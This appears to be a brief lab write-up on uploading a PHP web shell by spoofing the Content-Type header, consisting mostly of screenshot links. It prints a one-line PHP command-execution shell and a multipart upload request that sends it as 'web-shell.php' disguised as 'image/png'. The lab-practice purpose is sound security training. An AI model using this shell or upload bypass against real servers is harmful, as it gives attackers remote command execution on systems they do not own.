Web shell upload via Content-Type restriction bypass
![[20251013233053.png]](/assets/20251013233053.Dmxg_o9P.png)
![[20251013233559.png]](/assets/20251013233559.mQKuejwF.png)
c
<?php system($_GET['cmd']); ?>![[20251013234306.png]](/assets/20251013234306.DlDdAjmT.png)
![[20251013234406.png]](/assets/20251013234406.BMTH9ztk.png)
c
------geckoformboundaryc4b08b6f9c9e4c0be3e0bd9eac6ef1c8
Content-Disposition: form-data; name="avatar"; filename="web-shell.php"
Content-Type: image/png
<?php system($_GET['cmd']); ?>![[20251013234634.png]](/assets/20251013234634.NNCQKcwJ.png)
![[20251013234758.png]](/assets/20251013234758.Bw_SPkUx.png)